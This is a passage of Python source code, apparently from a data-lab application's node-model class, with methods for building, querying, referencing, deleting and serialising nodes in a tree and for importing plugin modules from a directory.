"""
recursive helper for get_branch
"""
if self.model[id]["type"] in ["file","column","timeseries"]:
#we do not take these values
nodes[id]={k:v for k,v in self.model[id].items() if k!="value"} # copy the whole but leave out the value
elif self.model[id]["type"] == "referencer":
nodes[id] = self.model[id]
if includeForwardRefs:
#for referencers, we take the direct targets
for targetId in self.model[id]["forwardRefs"]:
if self.model[targetId]["type"] in ["file", "column","timeseries"]:
# we do not take these values
target = {k: v for k, v in self.model[id].items() if k != "value"} # copy the whole but leave out the value
else:
target = copy.deepcopy(self.model[targetId])
#xxx todo, we might take the wrong backrefs with us, also these target nodes might not have their parent here
nodes[targetId]=target
else:
nodes[id]=self.model[id]
for child in self.model[id]["children"]:
nodes.update(self.__get_node_with_children(child,nodes,includeForwardRefs))
return nodes
def get_branch(self,desc,includeRoot=True,includeForwardRefs=True):
"""
get a branch of the model starting from desc including all children; the values of
columns, files and timeseries are excluded
for referencers, we do not follow a deep search for leaves, we just include the first-level referenced nodes
referenced nodes that are not part of the branch itself will also be included
Returns:
a dict of node-dicts (keyed by id) that can be used as a full, valid model again
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
nodes = {}
nodes.update(self.__get_node_with_children(id,nodes,includeForwardRefs))
#now we also need all nodes to the desc
if includeRoot:
while self.model[id]["parent"]!="0":
#the parent is valid, so take it; we don't make further checks for files and others here
parentId = self.model[id]["parent"]
parentNode = copy.deepcopy(self.model[parentId])
parentNode["children"]=[id] # the other side-children are not of interest
nodes.update({parentId:parentNode})
id = self.model[id]["parent"]
return copy.deepcopy(nodes)
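# usage sketch (illustrative only; `model` and the path are assumptions):
#   branch = model.get_branch("root.myfolder")   # dict {id: nodedict} incl. the parents up to root
#   slim = model.get_branch("root.myfolder", includeRoot=False, includeForwardRefs=False)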
def __get_node_with_children_pretty(self,id,depth = None,ignore = [],select={}):
"""
recursive helper for get_branch_pretty
args:
depth: how many child levels to descend, None for unlimited
ignore (list): name fragments; children whose browse path contains one of them are skipped
select (dict): {id: [property, property, ...]}; for the listed ids we only return the given properties
"""
#t=utils.Profiling(f"id {self.get_browse_path(id)}, ignore = {ignore}")
result = {}
node = self.model[id]
#create my properties
if id in select:
#special handling - we copy only some stuff
props = {k: copy.deepcopy(v) for k, v in node.items() if (k in select[id]) or (k in ["name","id"])}
else:
props = {k: copy.deepcopy(v) for k, v in node.items() if k not in ["value", "backRefs", "children", "object"]}
if node["type"] not in ["file", "column","timeseries"]:
# we also take the value then
props["value"] = copy.deepcopy(node["value"])
if node["type"] == "referencer" and (depth is None or depth>0):
#for the referencers, we take a lot of infos of the leaves as well as default, or if selected
props["targets"] = [self.get_browse_path(id) for id in self.model[id]["forwardRefs"]]
if (not (id in select)) or any(["leaves" in selectKey for selectKey in select[id]]):
leaves = self.get_leaves_ids(id)
#print(tt)
#tt.start("get leaves data")
forwards = [self.get_browse_path(leaf) for leaf in leaves]
props["leaves"]=forwards
#tt.lap("1")
props["leavesIds"]=leaves
if (not (id in select)) or ("leavesValues" in select[id]):
props["leavesValues"] = [self.get_value(id) if self.model[id]["type"] not in ["file","column","timeseries"] else None for id in leaves]
#tt.lap("2")
validation = []
if (not (id in select)) or ("leavesProperties" in select[id]) or ("leavesValidation" in select[id]):
props["leavesProperties"]={}
for id in leaves:
prop = self.get_node_info(id,includeLongValues=False)
if "validation" in prop:
validation.append(prop["validation"])
else:
validation.append(None)
props["leavesProperties"][id]=prop
props["leavesProperties"][id]["browsePath"]=self.get_browse_path(id)
#tt.lap("3")
props["leavesValidation"] = validation
#print(tt)
#make sure we have the browsepath on board
if "browsePath" not in props:
props["browsePath"]=self.get_browse_path(id)
result[".properties"]=props
if depth is None or depth>0:
#now the children
nextDepth = None
if depth is not None:
nextDepth = depth -1
for childId in node["children"]:
childPath = self.get_browse_path(childId)
if any([ignoreName in childPath for ignoreName in ignore]):
#self.logger.debug(f"ignore {childPath}")
pass
else:
result[self.model[childId]["name"]]=self.__get_node_with_children_pretty(childId,nextDepth,ignore,select)
#print(t)
return result
def get_context_menu(self,desc):
"""
get the data needed for the context menu, this is a helper for the UI
Args:
desc: the descriptor of the widget for which we want the context menu data
Returns:
all needed data to create a context menu, syntax is like get_branch_pretty
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
start = time.time()
#for the following nodes we only take one property, remove all other info
takeOnly = {"hasAnnotation.tags":["value"],
"hasAnnotation.visibleTags":["value"],
"hasAnnotation.colors":["value"],
"hasEvents.visibleEvents":["value"],
"hasEvents.colors":["value"],
"selectedVariables":["leavesIds","id"],
"contextMenuPipelines":["id","targets"],
"contextMenuFunctions" :["id","targets"],
"selectableVariables":["forwardRefs"],
"selectedVariables":["leaves","leavesIds"],
"scoreVariables":["leaves"]
}
takeOnly = {self.__get_id(id+"."+k):v for k,v in takeOnly.items()}
data = self.__get_node_with_children_pretty(id,depth=100,ignore = ["observer",
"hasAnnotation.anno",
"hasAnnotation.new",
"hasEvents.events",
".table",
"utton",
"scoreMap",
"theme",
"timeZone",
"startTime","endTime",
"bins",
"widgetType",
"hasHover",
"hasThreshold",
"hasSelection",
"width",
"height",
"controlPosition",
"hasStreaming",
"scoreMap",
"theme",
"nextNewAnnotation",
"backgroundHighlight",
"lineColors",
"hasBackground",
"backgroundMap"],
select=takeOnly)
#print("context bracnh took ",time.time()-start)
#now reduce the result further
#context menue pipelines
if "contextMenuFunctions" in data:
#remove all leaves info
deleteKeys = [key for key in data["contextMenuFunctions"][".properties"] if "leaves" in key]
for delKey in deleteKeys:
del data["contextMenuFunctions"][".properties"][delKey]
if "contextMenuPipelines" in data:
# remove all leaves info
deleteKeys = [key for key in data["contextMenuPipelines"][".properties"] if "leaves" in key]
for delKey in deleteKeys:
del data["contextMenuPipelines"][".properties"][delKey]
#print("context bracnh end ", time.time() - start)
return data
def get_branch_pretty(self,desc,depth=None,ignore = []):
"""
get a branch in the form
{"child1": {"child2": {...}, ".properties": {...}}, ".properties": {...}}
the properties appear under the ".properties" entry, the children are direct entries keyed by name
for referencers, the properties contain "targets" and "leaves" with full browse paths,
e.g. ["root.folder1.target2", "root.variable.bare", ...]
Args:
desc [string] the root node to start from
depth [int] the depth to look into
ignore [list] name fragments; children whose browse path contains one of them are skipped
"""
with self.lock:
#p=utils.Profiling("get_branch_pretty")
id = self.__get_id(desc)
if not id: return None
res = self.__get_node_with_children_pretty(id,depth,ignore)
#self.logger.debug(p)
return res
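# usage sketch (illustrative only; `model`, the path and the child names are assumptions):
#   pretty = model.get_branch_pretty("root.myfolder", depth=2, ignore=["observer"])
#   pretty[".properties"]               # properties of root.myfolder itself
#   pretty["child1"][".properties"]     # properties of root.myfolder.child1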
def get_node_with_children(self,desc):
""" retrieve node information including children of the first level
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node including the browsepath
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
response = copy.deepcopy(self.model[id])
response["browsePath"]=self.get_browse_path(id)
if response["children"]!=[]:
children =[]
for childId in response["children"]:
childInfo = copy.deepcopy(self.model[childId])
childInfo["browsePath"]=self.get_browse_path(childId)
children.append(childInfo)
response["children"]=children
return response
def get_models(self):
"""
get the available model files from the disk under /models
Returns: a list of strings (the model names without the '.model.json' extension)
"""
try:
mydir = myGlobalDir
os.chdir(mydir) # to enable import easily
files = os.listdir(mydir + '/models')
# take only the ones with '.json', but cut the '.model.json' extension
models = [f.split('.model')[0] for f in files if f.endswith(".json")]
return models
except Exception as ex:
self.logger.error("Model.get_models() failed "+str(ex))
return []
def get_info(self):
"""
get some information about the model
Returns: (dict) key value pairs on information of the model,
"""
return {"name":self.currentModelName}
def import_plugins_from_directory(self, plugin_directory: str, check_file_marker = True):
""" find all plugins from plugin_directory.
take from there the templates from the files and the functions
Args:
check_file_marker: if set to True, we expect a "#21datalabplugin" string in the first line
"""
if plugin_directory not in sys.path:
sys.path.append(plugin_directory) # for the importlib to find the stuff
plugin_filenames = glob.glob(os.path.join(plugin_directory, '**/*.py'), recursive=True)
for fileName in plugin_filenames:
if fileName.startswith('__'):
continue # avoid __pycache__ things
#we need to check if extra plugins have the "#21datalabplugin" marker in the first line
if check_file_marker:
absolutePath = os.path.join(myGlobalDir,fileName)
f = open(absolutePath,"r")
firstLine = f.readline()
f.close()
if firstLine != "#21datalabplugin\n":
continue
filename_relative = os.path.relpath(fileName, plugin_directory)
moduleName = os.path.splitext(filename_relative)[0].replace(os.path.sep, '.')
self.logger.info(f"import plugin lib {moduleName}")
module = importlib.import_module(moduleName)
module = importlib.reload(module) # if we change an already imported, python uses the cache, so to make sure we always get the latest, reimport here
#now analyze all objects in the module
for objName in dir(module):
if objName.startswith('__'):
continue # these are python generated info objects, we don't want them
element = getattr(module,objName)
if type(element) is dict:
#this is a template information
self.templates[moduleName+"."+objName]=copy.deepcopy(element)
elif (inspect.isclass(element)):
newClass = {"module":module,"class":element}
self.objectClasses[moduleName + "." + objName] = newClass
elif callable(element):
#this is a function, get more info
newFunction = {"module":module, "function":element}
self.functions[moduleName+"."+objName]=newFunction
def import_default_plugins(self):
""" find all plugins (= all .py files in the ./plugin folder
take from there the templates from the files and the functions
don't check them for #21datalabplugin marker
this function is execution on startup of the model
"""
self.import_plugins_from_directory(os.path.join(myGlobalDir, 'plugins'),check_file_marker=False)
def get_id(self,ids):
""" convert a descriptor or a list into only ids (which can be used as entry to the model dictionary
Args:
ids (string, list(string)): a single or list of strings containing either and id ("101") or browsepath ("root.myfolder.myvar")
Returns:
a list(id) or id as string
"""
with self.lock:
if type(ids) == type(list()):
newList = []
for id in ids:
newList.append(self.__get_id(id))
return newList
elif type(ids) == type(dict()):
newDict = {}
for oldId in ids:
id = self.__get_id(oldId)
newDict[id]=ids[oldId] #also copy the value
return newDict
else:
#assume its scalar
return self.__get_id(ids)
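# usage sketch (illustrative only; `model` and the descriptors are assumptions):
#   single = model.get_id("root.myfolder.myvar")             # -> the node id (e.g. "10") or None
#   many = model.get_id(["root.myfolder.myvar", "11"])       # -> list of ids
#   remapped = model.get_id({"root.myfolder.myvar": 1.5})    # -> dict re-keyed by ids, values kept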
def get_browse_path(self,desc):
"""
Args:
desc(string): a node id or browsepath
Returns:
(string) a browsepath
"""
with self.lock:
id = self.get_id(desc)
if not id in self.model:
return None
path = self.model[id]["name"]
while 1:
id = self.model[id]["parent"]
if id =="0":
break
else:
path = self.model[id]["name"]+"."+path
return path
def push_nodes(self,nodeDicts):
"""
push ready-made node dicts into the model
this is a dangerous function as it does not adjust references or parent/child relations whatsoever,
you must take care of that yourself
"""
for nodeDict in nodeDicts:
self.logger.warning(f"pushing node {nodeDict['id'], nodeDict['name']}")
self.model[nodeDict["id"]]=copy.deepcopy(nodeDict)
self.__notify_observers([],None) # just trigger the treeupdate for now
#xxx todo notify!
def create_node(self,parent="root",type="folder",value=None,name="newNode",properties={}):
"""
create a node inside the model by giving several infos
Args:
parent: a descriptor (browsepath or id) of the parent
type: the type of the node
value: (optional) give a value for the node
name(string): a name of the node, must be unique under the parent
properties (dict): a dictionary containing further key-values to be placed into the node as properties
Returns:
(string) nodeid,
None if a problem occurred during creation
"""
#check if parent exists
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return None
#check if the same name exists already
newpath = self.get_browse_path(parent)+"."+name
if self.get_id(newpath):
#we found it, it exists already, so we can't create it
return None
# we can create this node
if self.idCreationHash == True:
newId = str((random.randrange(2**64))) # a 64 bit random value
else:
self.globalIdCounter += 1
newId = str(self.globalIdCounter)
newNode = copy.deepcopy(self.nodeTemplate)
newNode.update({"id":newId,"name":name,"type":type,"parent":parentId})
if properties !={}:
newNode.update(properties)
if value != None:
newNode["value"]=value
self.model[parentId]["children"].append(newId)
self.model[newId] = newNode
if newNode["type"] == "timeseries":
if "tsAllocSize" in newNode:
allocSize = newNode["tsAllocSize"]
else:
allocSize = None
self.time_series_create(newId,allocSize = allocSize)
if newNode["type"] == "eventseries":
self.event_series_create(newId)
if newNode["type"] == "object":
if "class" not in newNode:
newNode["class"]=None
if "autoReload" not in newNode:
newNode["autoReload"] = False # set this to true means: on a "instantiate object, we reload the module
self.__notify_observers(parentId,"children")
return newNode["id"]
def create_annotation(self,nodesToCreate):
"""
special helper function to quickly create an annotation, emitting a single UI event info with all modifications at once
Args:
nodesToCreate (list[dict]): the node dicts to create; each entry must contain a "browsePath" and "type",
referencer entries can also contain "targets" (a list of target descriptors)
Returns: the id of the created annotation
"""
try:
with self.lock:
self.disable_observers()
annoId = None
for node in nodesToCreate:
targets=[]
if "targets" in node:
targets = node["targets"]
del node["targets"]
id = self.create_node_from_path(node["browsePath"], node)
if node["type"]=="annotation":
annoId = id
if targets:
self.add_forward_refs(id,targets)
annotation = self.get_node(annoId)
infoDict = {
"id": annotation.get_id(),
"name": annotation.get_name(),
"browsePath": annotation.get_browse_path()
}
for child in annotation.get_children():
if child.get_type()=="referencer":
infoDict[child.get_name()]=[target.get_browse_path() for target in child.get_targets()]
else:
infoDict[child.get_name()] = child.get_value()
except:
self.log_error()
self.enable_observers()
if annoId:
self.notify_observers(self.model[annoId]["parent"], "children", eventInfo={"new": {annoId:infoDict},"delete":{},"modify":{}})
return annoId
def create_node_from_path(self,path,properties={"type":"variable"}):
"""
create a node from the path given; all intermediate nodes of the path that do not yet exist are created as folder type
Args:
path(string): the path of the node to be created
properties(dict): the properties of the node
example:
create_node_from_path("root.myfolder.something.thisvar")
this will create myfolder as folder, something as folder, thisvar as variable and will also
set all hierarchies correctly
Returns:
(string) the nodeid created or
None if problem during creation
"""
currentNode = "root" #root
with self.lock:
for node in path.split('.')[1:-1]:
if not self.__get_id(currentNode+'.'+node):
#this one does not exist, so make it
self.create_node(currentNode,name=node)
currentNode += '.'+node
return self.create_node(parent=currentNode,name=path.split('.')[-1],properties=properties)
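# usage sketch (illustrative only; `model` is an assumption, the path mirrors the docstring example):
#   newId = model.create_node_from_path("root.myfolder.something.thisvar", {"type": "variable"})
#   # "myfolder" and "something" are auto-created as folders if they do not exist yet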
def create_nodes_from_template(self,parent="root",template=[]):
"""
deprecated!! this is the old style of templates as lists, now it's a dict
Create a node from a template; a template is a list of node-dicts,
Args:
parent(string): descriptor of the parent node under which the nodes of the template should be created
template: a list of node dicts of the nodes to be created, children are allowed as dict
Returns:
(boolean) True for created, False for error
Example:
create_nodes_from_template(parent="root.myfolder",[{"name":"myvariable1","type":"variable"},
{"name":"myfolder","type":"folder","children":[
{"name":"mysubvar","type":"variable"}]])
"""
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return False
newNodeIds = [] #these must be corrected later
for node in template:
#we take all info from the nodes and insert it into the tree
nodeName = node["name"]
newNodeId = self.create_node(parentId,name=nodeName,properties=node)
newNodeIds.append(newNodeId)
#do we have "children per template syntax"?, then remove that property from the nodes and make more nodes
if "children" in self.model[newNodeId]:
savedChildren = copy.deepcopy(self.model[newNodeId]["children"])
self.model[newNodeId]["children"]=[] # empty out
for child in savedChildren:
newChildId = self.create_node(newNodeId,name=child["name"],properties=child)
newNodeIds.append(newChildId)
#now correct missing stuff
for nodeId in newNodeIds:
if self.model[nodeId]["type"]== "referencer":
# convert the path of references into an id: get the parent path, add the tail, convert to id
forwardReferences =self.model[nodeId]["forwardRefs"] #make a copy, we'll delete this
self.model[nodeId]["forwardRefs"]=[]
parentPath = self.get_browse_path(self.model[nodeId]["parent"])
for forwardRef in forwardReferences:
forwardPath = parentPath+forwardRef
self.add_forward_refs(nodeId,[forwardPath])
return True
def __create_nodes_from_path_with_children(self,parentPath,nodes):
"""
recursive helper function for create_template_from_path
we build all nodes under the parentPath on this level and then the children
we return a list of all created node ids
"""
createdNodes = []
for node in nodes:
newModelNode = {}
for k, v in node.items():
if k not in ["children", "parent", "id", "browsePath"]: # avoid stupid things
newModelNode[k] = v
newId = self.create_node_from_path(parentPath+'.'+newModelNode["name"],newModelNode)
if newId:
createdNodes.append(newId)
if "children" in node:
createdNodes.extend(self.__create_nodes_from_path_with_children(parentPath+'.'+newModelNode["name"],node["children"]))
return createdNodes
def create_template_from_path(self,path,template):
"""
Create a template from a path given, the template contains one or more nodes
the path must not yet exist!
Args:
path(string): the path under which the template will be placed. the template always contains
a root node, this will be renamed according to the path
Returns:
(boolean) True for created, False for error
"""
with self.lock:
#first create the template root node
#we rename the template according to the path requested
template["name"]=path.split('.')[-1]
parentPath = '.'.join(path.split('.')[:-1])
newNodeIds = self.__create_nodes_from_path_with_children(parentPath,[template])
self.logger.debug(f"create_template_from_path, new nodeids: {newNodeIds}")
#now adjust the references of new nodes and of the ones that were there
for newNodeId in newNodeIds:
if "references" in self.model[newNodeId]:
#we must create forward references
for ref in self.model[newNodeId]["references"]:
# now there are two options:
# the given path is of the form templatename.levelone.leveltwo inside the template
# we replace the "templatename" with the path name the template was given
# or the path is absolute id or browsepath, then we don't modify
splitted = ref.split('.')
if len(splitted) == 1 or splitted[0]=="root":
targetPath = ref
else:
targetPath = parentPath+'.'+template['name']+'.'+'.'.join(ref.split('.')[1:])
self.add_forward_refs(newNodeId,[targetPath])
del self.model[newNodeId]["references"] # we remove the reference information from the template
def get_templates(self):
"""
give all templates loaded
Returns: a dict with entries containing the full templates
"""
with self.lock:
return copy.deepcopy(self.templates)
def add_forward_refs(self,referencerDesc,targets,allowDuplicates = True):
"""
adding forward references from a referencer to other nodes, the forward references are appended at the list
of forward references of the referencer node
references to oneself are not allowed
Args:
referencerDesc (string): descriptor of the referencer node to which we want to add forward references
targets (list(descriptors)): list of node descriptors to which we want to add forward refs
Returns:
True/False for success
"""
changed = False
with self.lock:
fromId = self.get_id(referencerDesc)
if not fromId:
self.logger.error("can't set forward ref on "+str(referencerDesc))
return False
if type(targets) is not list:
targets = [targets]
if targets==[]:
return True
if not self.model[fromId]["type"]=="referencer":
self.logger.error("can't set forward ref on "+str(referencerDesc)+ "is not type referencer, is type"+self.model[fromId]["type"])
return False
for target in targets:
toId = self.get_id(target)
if not toId:
continue
if toId == fromId:
continue
if not allowDuplicates:
if toId in self.model[fromId]["forwardRefs"]:
continue # ignore this forwards ref, we have it already
self.model[toId]["backRefs"].append(fromId)
self.model[fromId]["forwardRefs"].append(toId)
changed = True
if changed:
self.__notify_observers(fromId,"forwardRefs")
return True
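# usage sketch (illustrative only; `model`, the referencer and the target paths are assumptions):
#   refId = model.create_node("root.myfolder", type="referencer", name="myrefs")
#   model.add_forward_refs(refId, ["root.myfolder.myvar", "root.other.var2"])
#   model.add_forward_refs(refId, ["root.myfolder.myvar"], allowDuplicates=False)   # second entry is skipped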
def lock_model(self):
self.lock.acquire()
def release_model(self):
self.lock.release()
def get_model(self):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
"""
with self.lock:
#also add the browsepath to all nodes
for nodeid in self.model:
self.model[nodeid]["browsePath"]=self.get_browse_path(nodeid)
return copy.deepcopy(self.model)
def get_model_for_web(self,getHash=False):
"""
Returns: the full deepcopy of the internal model object (list of dictionaries of the nodes)
but leaving out the column values (this can be a lot of data)
and the file values (files are binary or strings with big size, typically serialized ML-models)
for files and columns, we either return a placeholder string "len <length>" or the sha1 hash of the value (if getHash is set)
"""
model = {}
p=utils.Profiling("get_model_for_web")
with self.lock:
for nodeId, nodeDict in self.model.items():
if nodeDict["type"] in ["column","file","timeseries","eventseries"]:
# with columns we filter out the values
node = {}
for nk, nv in nodeDict.items():
if nk == "value":
try:
if not getHash:
node[nk] = "len " + str(len(nv))
else:
start = datetime.datetime.now()
hash = hashlib.sha1(nv.tobytes())
node[nk] = hash.hexdigest()
self.logger.debug(f"hashed {nodeDict['name']} in {(datetime.datetime.now()-start).total_seconds()} hash:{node[nk]}")
except:
node[nk] = "None"
else:
node[nk] = copy.deepcopy(nv) # values can be list, dict and deeper objects
model[nodeId] = node
elif nodeDict["type"]=="object":
node={k:v for k,v in nodeDict.items() if k!="object"}
model[nodeId]=node
else:
#this node is not a colum, can still hold huge data
model[nodeId] = copy.deepcopy(nodeDict) # values can be list, dict and deeper objects nodeDict
if "value" in model[nodeId]:
import numbers
try:
if isinstance(model[nodeId]["value"], numbers.Number):
if not (numpy.all(numpy.isfinite(model[nodeId]["value"]))):
model[nodeId]["value"] = None
except Exception as e:
self.logger.error(f"problem in get_model_for_web {e}")
model[nodeId]["browsePath"] = self.get_browse_path(nodeId) #also add the browsepath
#self.logger.debug(f"get model for weg took{p}")
return model
def remove_forward_refs(self,sourceDesc,targetDescriptors = [], deleteDuplicates=False):
"""
remove forward references from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
targetDescriptors: a list of target descriptors; if empty, we remove all forward references
deleteDuplicates: if set to True, we delete all references to a target if we have more than one reference
Returns:
True/False for success
"""
changed = False
with self.lock:
fromId = self.get_id(sourceDesc)
if not fromId:
return False
if not self.model[fromId]["type"] == "referencer":
return False # only for referencers
if targetDescriptors == []:
targets = self.model[fromId]["forwardRefs"].copy()
else:
targets = self.get_id(targetDescriptors)
if targets == []:
return True# nothing to do
for toId in targets:
if not toId:
continue # we skip Nones coming from the get_id
if deleteDuplicates:
# maybe multiple entries
while toId in self.model[fromId]["forwardRefs"]: # maybe multiple entries
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
changed = True
else:
# we delete only one entry
if toId in self.model[fromId]["forwardRefs"]:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
changed = True
if changed:
self.__notify_observers(fromId,"forwardRefs")
return True
def remove_forward_ref(self,sourceDesc,targetDesc):
"""
remove a forward reference from a referencer, this also removes the backreference from the target
Args:
sourceDesc: the descriptor of the referencer node
Returns:
True/False for success
"""
with self.lock:
fromId = self.get_id(sourceDesc)
toId = self.get_id(targetDesc)
if not fromId or not toId:
return False
if not self.model[fromId]["type"]=="referencer":
return False # only for referencers
try:
self.model[fromId]["forwardRefs"].remove(toId)
self.model[toId]["backRefs"].remove(fromId)
self.__notify_observers(fromId, "forwardRefs")
return True
except:
return False
def remove_back_ref(self,sourceDesc,targetDesc):
"""
remove a backwards reference from any node to a referencer, this also removes the forward reference from the target
actually, this function is just a helper. Normally, we only talk about "forward references";
each forward reference also creates a backwards reference in the model, but this is just for internal look-up speed
the reference here is targetDesc -> (forwardRef) -> sourceDesc
Args:
sourceDesc: the descriptor of the node that holds a backwards reference
targetDesc: the descriptor of the node that holds the forward reference
Returns:
True/False for success
"""
with self.lock:
return self.remove_forward_ref(targetDesc,sourceDesc)
def add_property(self,nodeDesc,property,value):
"""
add an arbitrary property entry to a node; a node is a key-value store, a property is a key with a value
Args:
nodeDesc: the descriptor of the node
property: the key to be created on the node
value: the value to be stored for this property
Returns:
True for create
False for node not found or if the property already exists
"""
with self.lock:
id = self.get_id(nodeDesc)
if not id:
return False
if property in self.model[id]:
return False # have this property already
self.model[id][property]=value
self.__notify_observers(id, property)
return True
def set_properties(self,properties={},nodeDesc=None,notify=True):
"""
changes an arbitrary set of properties given by the dict or adds them if not existent; some properties are not allowed here:
children, parent, forward and backward refs; allowed are all others including type, name, value
Args:
nodeDesc: the descriptor of the node, optional; it can also be given as browsePath or id inside the properties dict
properties: the new properties or changed
Returns:
True for done
False for node not found
"""
with self.lock:
if nodeDesc:
id = self.get_id(nodeDesc)
elif "id" in properties:
id = properties["id"]
elif "browsePath" in properties:
id = self.get_id(properties["browsePath"])
else:
self.logger.error("set properties is missing id ")
return False
if not id:
return False
notificationProperties = []
for k,v in properties.items():
if k in ["id","browsePath","children","parent","forwardRefs","backRefs"]:
continue # we ignore these entries
self.model[id][k]=v # overwrite or set new
notificationProperties.append(k)
if notify:
self.__notify_observers(id,notificationProperties)
return True
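# usage sketch (illustrative only; `model`, the path and the property names are assumptions):
#   model.add_property("root.myfolder.myvar", "unit", "degC")    # fails if "unit" already exists on the node
#   model.set_properties({"unit": "degC", "comment": "sensor 1"}, nodeDesc="root.myfolder.myvar")
#   model.set_properties({"id": "10", "name": "renamedVar"})     # the target can also be given inside the dict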
def find_all_children_recursive(self,nodeIds):
""" find all children recursively, give a list of """
with self.lock:
children = []
for id in nodeIds:
if self.model[id]["children"]:
children.extend(self.find_all_children_recursive(self.model[id]["children"]))
children.append(id)
return children
#delete node and all subnodes
def delete_node(self,desc):
"""
delete a node and all its recursive children;
flow:
1) make a list of all nodes to be deleted
2) rip off all references to/from the nodes to be deleted
3) delete all nodes
4) notify observers about the children change on the parents of the deleted nodes
desc(string): the descriptor of the node
Returns:
True for success
False for node not found
"""
with self.lock:
id = self.get_id(desc)
if not id:
return False
nodesToDelete = self.find_all_children_recursive([id])
self.logger.debug(f"delete nodes {nodesToDelete}")
childNotify = []
#first rip off all references
for id in nodesToDelete:
forwards = self.model[id]["forwardRefs"].copy()
backwards = self.model[id]["backRefs"].copy()
for forward in forwards:
self.remove_forward_ref(id,forward) # this will also trigger observers
for backward in backwards:
self.remove_back_ref(id,backward) # this will also trigger observers
#now delete the actual nodes
for id in nodesToDelete:
parentId = self.model[id]["parent"]
if parentId in self.model:
self.model[parentId]["children"].remove(id)
childNotify.append(parentId)
if self.model[id]["type"]=="timeseries":
self.time_series_delete(id)
del self.model[id]
#now notify only those who still exist
goodNotify=[]
for id in childNotify:
if id in self.model:
goodNotify.append(id)
if goodNotify:
self.__notify_observers(goodNotify, "children") # make ONE call for the observers
return True
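# usage sketch (illustrative only; `model` and the path are assumptions):
#   model.delete_node("root.myfolder")   # removes the node, all its descendants and all references to/from them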
# if desc.type is a var or function then we just set the value
# if it's a "timeseries" then we set a column in a table, padded if needed
def set_value(self,desc,value):
"""
set the value property of a node, if the node does not have a value property yet, it is created here
Args:
desc(string): node descriptor
value (any): any value to be stored
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
#convert if table:
if self.model[id]["type"] == "column":
value = numpy.asarray(value,dtype=numpy.float64)
self.model[id]["value"] = value
self.__notify_observers(id,"value")
return True
def get_value(self,desc):
"""
read out the "value" property of a node
Args:
desc(string): the node that holds the value
Returns:
the value
None if the node has no "value" property
"""
with self.lock:
id = self.get_id(desc)
if not id: return None
if self.model[id]["type"] == "timeseries":
values = self.time_series_get_table(id)
if values:
return self.time_series_get_table(id)[id]["values"]
else:
return None
if "value" in self.model[id]:
return copy.deepcopy(self.model[id]["value"])
else:
return None
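# usage sketch (illustrative only; `model` and the path are assumptions):
#   model.set_value("root.myfolder.myvar", 42)
#   print(model.get_value("root.myfolder.myvar"))   # -> 42 (a deep copy of the stored value)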
def __copy_node(self,id,resolveChildren=False):
"""
get a copy of a node, we don't create a node in the model here!
copy node with all properties, if the node is a "column", we don't copy the value
if the resolveChildren is set to true, we also copy the direct children
the copied node can't be used to create a node, as it is the copy of an existing node!
Args:
id (string): the node id to be copied
resolveChildren (bool): False to not copy the children (the new node has no children)
True to copy-create also the children
Return:
(dict) the node
"""
newNode = {}
for key in self.model[id]:
if key == "value" and self.model[id]["type"]in ["column","file","timeseries"]:
newNode["value"]=None
elif key == "children" and resolveChildren:
#we also copy the children
newNode["children"]=[]
for childId in self.model[id]["children"]:
childNode = self.__copy_node(childId)
newNode["children"].append(childNode)
elif key == "object":
continue
else:
newNode[key]=copy.deepcopy(self.model[id][key])
return newNode
def __get_targets(self,id,includeNodeInfo=True):
"""
#this is a recursive helper function for the get_leaves function
"""
targets=[]
if self.model[id]["type"] == "referencer":
for targetId in self.model[id]["forwardRefs"]:
targets.extend(self.__get_targets(targetId,includeNodeInfo))
elif self.model[id]["type"] == "folder":
for targetId in self.model[id]["children"]:
targets.extend(self.__get_targets(targetId,includeNodeInfo))
else:
if includeNodeInfo:
addNode = self.__copy_node(id,resolveChildren=True)
addNode["browsePath"]=self.get_browse_path(id)
else:
addNode={"id":id,"children":self.model[id]["children"]}
targets = [addNode]
return targets
def get_leaves_ids(self,desc):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
leaves = self.get_leaves(desc) # a list of node dicts
leaveIds = []
for leave in leaves:
leaveIds.append(leave["id"])
return leaveIds
def get_leaves(self,desc,allowDuplicates=False,includeNodeInfo=True):
"""
Args:
includeNodeInfo : if set true, we get the properties of the node, else we only get the id
this function returns a list of dicts containing the leaves where this referencer points to
this functions works only for nodes of type "referencer", as we are following the forward references
leaves are defined as following:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if nodes pointed to are referencer, the targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencer or folder themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
Returns:
all node dicts which are considered leaves as a list of node dicts
"""
with self.lock:
id = self.__get_id(desc)
if not id:return None
targets=self.__get_targets(id,includeNodeInfo)
if targets and targets[0]["id"] == id:
#this can happen if the node is not a folder or referencer and has no children
targets.pop(0)
#before we return, we remove duplicates if wanted
if targets and allowDuplicates == False:
reducedTargets = []
ids = []
for t in targets:
if t["id"] in ids:
continue
reducedTargets.append(t)
ids.append(t["id"])
return reducedTargets
else:
return targets
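# usage sketch (illustrative only; `model` and the referencer path are assumptions):
#   leafDicts = model.get_leaves("root.myfolder.myrefs")      # list of node dicts incl. "browsePath"
#   leafIds = model.get_leaves_ids("root.myfolder.myrefs")    # only the ids of the same leaves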
def get_widget_view(self,desc,version):
""" get a set of nodes and info thereof to save a view """
with self.lock:
id = self.__get_id(desc)
if not id: return {}
widget = self.get_node(id)
if widget.get_type()!="widget" or version!=1:
return {}
result = {}
#now collect all info
values = ["currentColors","startTime","endTime","hasAnnotation.visibleTags","visibleElements","autoScaleY","panOnlyX","streamingMode","hasEvents.visibleEvents"]
refs = ["selectedVariables"]
for v in values:
result[v]={"value":widget.get_child(v).get_value()}
for r in refs:
referencerId = widget.get_child(r).get_id()
self.model[referencerId]["forwardRefs"]
